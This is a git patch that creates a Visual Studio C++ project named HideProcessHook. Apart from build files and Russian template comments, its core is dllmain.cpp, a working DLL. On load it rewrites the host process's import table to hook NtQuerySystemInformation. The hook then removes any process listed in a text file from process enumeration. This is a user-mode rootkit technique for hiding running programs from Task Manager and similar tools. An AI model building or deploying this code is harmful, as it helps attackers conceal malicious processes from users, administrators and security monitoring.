From 735fa8ed5acb92497ca5cb5ebfba68fa3bb56936 Mon Sep 17 00:00:00 2001
From: Irval <emealex26@gmail.com>
Date: Tue, 17 Aug 2021 22:39:02 +0300
Subject: [PATCH] Create repository

---
 HideProcessHook.sln                           |  31 ++++
 HideProcessHook/HideProcessHook.vcxproj       | 173 ++++++++++++++++++
 .../HideProcessHook.vcxproj.filters           |  33 ++++
 HideProcessHook/HideProcessHook.vcxproj.user  |   4 +
 HideProcessHook/dllmain.cpp                   | 170 +++++++++++++++++
 HideProcessHook/framework.h                   |   5 +
 HideProcessHook/pch.cpp                       |   5 +
 HideProcessHook/pch.h                         |  13 ++
 8 files changed, 434 insertions(+)
 create mode 100644 HideProcessHook.sln
 create mode 100644 HideProcessHook/HideProcessHook.vcxproj
 create mode 100644 HideProcessHook/HideProcessHook.vcxproj.filters
 create mode 100644 HideProcessHook/HideProcessHook.vcxproj.user
 create mode 100644 HideProcessHook/dllmain.cpp
 create mode 100644 HideProcessHook/framework.h
 create mode 100644 HideProcessHook/pch.cpp
 create mode 100644 HideProcessHook/pch.h

diff --git a/HideProcessHook.sln b/HideProcessHook.sln
new file mode 100644
index 0000000..edd264e
--- /dev/null
+++ b/HideProcessHook.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30114.105
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HideProcessHook", "HideProcessHook\HideProcessHook.vcxproj", "{10E14C81-B801-4FA3-B3CB-954D083CAC0C}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Debug|x64.ActiveCfg = Debug|x64
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Debug|x64.Build.0 = Debug|x64
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Debug|x86.ActiveCfg = Debug|Win32
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Debug|x86.Build.0 = Debug|Win32
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Release|x64.ActiveCfg = Release|x64
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Release|x64.Build.0 = Release|x64
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Release|x86.ActiveCfg = Release|Win32
+		{10E14C81-B801-4FA3-B3CB-954D083CAC0C}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {A33CF6FC-411E-46D9-9B23-80CA19B83650}
+	EndGlobalSection
+EndGlobal
diff --git a/HideProcessHook/HideProcessHook.vcxproj b/HideProcessHook/HideProcessHook.vcxproj
new file mode 100644
index 0000000..079895b
--- /dev/null
+++ b/HideProcessHook/HideProcessHook.vcxproj
@@ -0,0 +1,173 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{10e14c81-b801-4fa3-b3cb-954d083cac0c}</ProjectGuid>
+    <RootNamespace>HideProcessHook</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;HIDEPROCESSHOOK_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <DisableSpecificWarnings>4996;%(DisableSpecificWarnings)</DisableSpecificWarnings>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;HIDEPROCESSHOOK_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <DisableSpecificWarnings>4996;%(DisableSpecificWarnings)</DisableSpecificWarnings>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;HIDEPROCESSHOOK_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <DisableSpecificWarnings>4996;%(DisableSpecificWarnings)</DisableSpecificWarnings>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;HIDEPROCESSHOOK_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <DisableSpecificWarnings>4996;%(DisableSpecificWarnings)</DisableSpecificWarnings>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="framework.h" />
+    <ClInclude Include="pch.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp" />
+    <ClCompile Include="pch.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/HideProcessHook/HideProcessHook.vcxproj.filters b/HideProcessHook/HideProcessHook.vcxproj.filters
new file mode 100644
index 0000000..5d37be4
--- /dev/null
+++ b/HideProcessHook/HideProcessHook.vcxproj.filters
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Исходные файлы">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Файлы заголовков">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Файлы ресурсов">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="framework.h">
+      <Filter>Файлы заголовков</Filter>
+    </ClInclude>
+    <ClInclude Include="pch.h">
+      <Filter>Файлы заголовков</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp">
+      <Filter>Исходные файлы</Filter>
+    </ClCompile>
+    <ClCompile Include="pch.cpp">
+      <Filter>Исходные файлы</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/HideProcessHook/HideProcessHook.vcxproj.user b/HideProcessHook/HideProcessHook.vcxproj.user
new file mode 100644
index 0000000..88a5509
--- /dev/null
+++ b/HideProcessHook/HideProcessHook.vcxproj.user
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>
\ No newline at end of file
diff --git a/HideProcessHook/dllmain.cpp b/HideProcessHook/dllmain.cpp
new file mode 100644
index 0000000..e0902d0
--- /dev/null
+++ b/HideProcessHook/dllmain.cpp
@@ -0,0 +1,170 @@
+#include"pch.h"
+#include <Windows.h>
+#include <Psapi.h>
+#include <TlHelp32.h>
+#include <stdio.h>
+#include <winternl.h>
+#include <string>
+#include <fstream>
+#include <vector>
+#include <thread>
+
+#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
+
+typedef struct _MY_SYSTEM_PROCESS_INFORMATION
+{
+	ULONG                   NextEntryOffset;
+	ULONG                   NumberOfThreads;
+	LARGE_INTEGER           Reserved[3];
+	LARGE_INTEGER           CreateTime;
+	LARGE_INTEGER           UserTime;
+	LARGE_INTEGER           KernelTime;
+	UNICODE_STRING          ImageName;
+	ULONG                   BasePriority;
+	HANDLE                  ProcessId;
+	HANDLE                  InheritedFromProcessId;
+} MY_SYSTEM_PROCESS_INFORMATION, * PMY_SYSTEM_PROCESS_INFORMATION;
+
+typedef NTSTATUS(WINAPI* PNT_QUERY_SYSTEM_INFORMATION)(
+	__in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	__inout    PVOID SystemInformation,
+	__in       ULONG SystemInformationLength,
+	__out_opt  PULONG ReturnLength
+	);
+
+PNT_QUERY_SYSTEM_INFORMATION OriginalNtQuerySystemInformation =
+(PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll"),
+	"NtQuerySystemInformation");
+
+std::vector<std::wstring> HidingProcesses = {};
+
+NTSTATUS WINAPI HookedNtQuerySystemInformation(
+	__in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	__inout    PVOID                    SystemInformation,
+	__in       ULONG                    SystemInformationLength,
+	__out_opt  PULONG                   ReturnLength
+)
+{
+	NTSTATUS status = OriginalNtQuerySystemInformation(SystemInformationClass,
+		SystemInformation,
+		SystemInformationLength,
+		ReturnLength);
+	if (SystemProcessInformation == SystemInformationClass && STATUS_SUCCESS == status)
+	{
+		PMY_SYSTEM_PROCESS_INFORMATION pCurrent = NULL;
+		PMY_SYSTEM_PROCESS_INFORMATION pNext = (PMY_SYSTEM_PROCESS_INFORMATION)
+			SystemInformation;
+
+		do
+		{
+			pCurrent = pNext;
+			pNext = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->
+				NextEntryOffset);
+			bool ifTrue = false;
+			for (int i = 0; i < HidingProcesses.size(); i++) {
+				ifTrue = ifTrue || !wcsncmp(pNext->ImageName.Buffer, HidingProcesses[i].c_str(), pNext->ImageName.Length);
+			}
+			if (ifTrue)
+			{
+				if (!pNext->NextEntryOffset)
+				{
+					pCurrent->NextEntryOffset = 0;
+				}
+				else
+				{
+					pCurrent->NextEntryOffset += pNext->NextEntryOffset;
+				}
+				pNext = pCurrent;
+			}
+		} while (pCurrent->NextEntryOffset != 0);
+	}
+	return status;
+}
+
+DWORD pID;
+DWORD dll;
+
+DWORD StartHook(LPVOID lpModule) {
+	MODULEINFO modInfo = { 0 };
+	HMODULE hModule = GetModuleHandle(0);
+
+	GetModuleInformation(GetCurrentProcess(), hModule, &modInfo, sizeof(MODULEINFO));
+
+	char szAddress[64];
+
+	LPBYTE pAddress = (LPBYTE)modInfo.lpBaseOfDll;
+	PIMAGE_DOS_HEADER pIDH = (PIMAGE_DOS_HEADER)pAddress;
+
+	PIMAGE_NT_HEADERS pINH = (PIMAGE_NT_HEADERS)(pAddress + pIDH->e_lfanew);
+	PIMAGE_OPTIONAL_HEADER pIOH = (PIMAGE_OPTIONAL_HEADER) & (pINH->OptionalHeader);
+	PIMAGE_IMPORT_DESCRIPTOR pIID = (PIMAGE_IMPORT_DESCRIPTOR)(pAddress + pIOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+
+	for (; pIID->Characteristics; pIID++) {
+		if (!strcmp("ntdll.dll", (char*)(pAddress + pIID->Name)))
+			break;
+	}
+
+	PIMAGE_THUNK_DATA pITD = (PIMAGE_THUNK_DATA)(pAddress + pIID->OriginalFirstThunk);
+	PIMAGE_THUNK_DATA pFirstThunkTest = (PIMAGE_THUNK_DATA)((pAddress + pIID->FirstThunk));
+	PIMAGE_IMPORT_BY_NAME pIIBM = nullptr;
+
+	for (; !(pITD->u1.Ordinal & IMAGE_ORDINAL_FLAG) && pITD->u1.AddressOfData; pITD++) {
+		pIIBM = (PIMAGE_IMPORT_BY_NAME)(pAddress + pITD->u1.AddressOfData);
+		if (!strcmp("NtQuerySystemInformation", (char*)(pIIBM->Name)))
+			break;
+		pFirstThunkTest++;
+	}
+
+	DWORD dwOld = NULL;
+	VirtualProtect((LPVOID) & (pFirstThunkTest->u1.Function), sizeof(uintptr_t), PAGE_READWRITE, &dwOld);
+	pFirstThunkTest->u1.Function = (uintptr_t)HookedNtQuerySystemInformation;
+	VirtualProtect((LPVOID) & (pFirstThunkTest->u1.Function), sizeof(uintptr_t), dwOld, NULL);
+
+	sprintf(szAddress, "%s 0x%I64X", (char*)(pIIBM->Name), pFirstThunkTest->u1.Function);
+
+	if (pIDH->e_magic != IMAGE_DOS_SIGNATURE)
+		MessageBox(NULL, "Failed", "NtQuerySystemInformation Hook", MB_OK);
+
+	CloseHandle(hModule);
+	return 0;
+}
+
+DWORD UpdateThread(LPVOID lpModule) {
+	while (1) {
+		HidingProcesses.clear();
+
+		std::string s;
+		std::ifstream file;
+		file.open("HidingProcesses.txt");
+
+
+		if (!file) {
+			file.close();
+			FILE* f = fopen("HidingProcesses.txt", "w");
+			fclose(f);
+			UpdateThread(lpModule);
+		}
+
+
+		while (std::getline(file, s)) {
+			std::wstring wstr(s.begin(), s.end());
+			HidingProcesses.push_back(wstr);
+		}
+
+		file.close();
+		Sleep(10000);
+	}
+	return 0;
+}
+
+bool __stdcall DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)
+{
+	switch (dwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(NULL, 0, UpdateThread, hModule, NULL, NULL);
+		CreateThread(NULL, 0, StartHook, hModule, NULL, NULL);
+		break;
+	}
+	return TRUE;
+}
\ No newline at end of file
diff --git a/HideProcessHook/framework.h b/HideProcessHook/framework.h
new file mode 100644
index 0000000..61ca0b6
--- /dev/null
+++ b/HideProcessHook/framework.h
@@ -0,0 +1,5 @@
+#pragma once
+
+#define WIN32_LEAN_AND_MEAN             // Исключите редко используемые компоненты из заголовков Windows
+// Файлы заголовков Windows
+#include <windows.h>
diff --git a/HideProcessHook/pch.cpp b/HideProcessHook/pch.cpp
new file mode 100644
index 0000000..9211a5e
--- /dev/null
+++ b/HideProcessHook/pch.cpp
@@ -0,0 +1,5 @@
+// pch.cpp: файл исходного кода, соответствующий предварительно скомпилированному заголовочному файлу
+
+#include "pch.h"
+
+// При использовании предварительно скомпилированных заголовочных файлов необходим следующий файл исходного кода для выполнения сборки.
diff --git a/HideProcessHook/pch.h b/HideProcessHook/pch.h
new file mode 100644
index 0000000..4f16fe2
--- /dev/null
+++ b/HideProcessHook/pch.h
@@ -0,0 +1,13 @@
+// pch.h: это предварительно скомпилированный заголовочный файл.
+// Перечисленные ниже файлы компилируются только один раз, что ускоряет последующие сборки.
+// Это также влияет на работу IntelliSense, включая многие функции просмотра и завершения кода.
+// Однако изменение любого из приведенных здесь файлов между операциями сборки приведет к повторной компиляции всех(!) этих файлов.
+// Не добавляйте сюда файлы, которые планируете часто изменять, так как в этом случае выигрыша в производительности не будет.
+
+#ifndef PCH_H
+#define PCH_H
+
+// Добавьте сюда заголовочные файлы для предварительной компиляции
+#include "framework.h"
+
+#endif //PCH_H
\ No newline at end of file